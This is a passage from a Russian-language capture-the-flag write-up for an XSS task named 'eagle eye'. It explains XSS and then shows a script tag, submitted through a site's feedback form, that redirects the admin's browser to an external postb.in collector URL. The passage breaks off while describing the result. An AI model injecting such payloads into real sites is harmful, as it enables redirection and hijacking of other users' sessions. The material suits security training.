Разбираем одиннадцатую задачку из нашего соревнования CTF. Задание называется eagle eye, дают 1000 баллов за флаг. Забегая вперёд, скажу, что эта задачка на XSS уязвимость. XSS (Cross-Site Scripting — межсайтовый скриптинг) — тип атаки на веб-системы, заключающийся во внедрении в выдаваемую веб-системой страницу вредоносного кода (который будет выполнен на компьютере пользователя при открытии им этой страницы) и взаимодействии этого кода с веб-сервером злоумышленника. Ссылки CTF - Capture The Flag Решение Переходим на сайт задания. У нас обычный сайт-визитка. Единственное, с чем можно взаимодействовать — это форма обратной связи. Попробуем XSS. В качестве внешнего сервера используем сайт: https://postb.in/ Пишем скрипт, который отправит нам на внешний сайт что-нибудь. <script>location.href='https://postb.in/juk1M7LP/?hack=ctf';</script> Если админ откроет письмо и наш код сработает, то мы перенаправим его куда хотим. Смотрим результат: Становится понятно, что комп админа не защищён от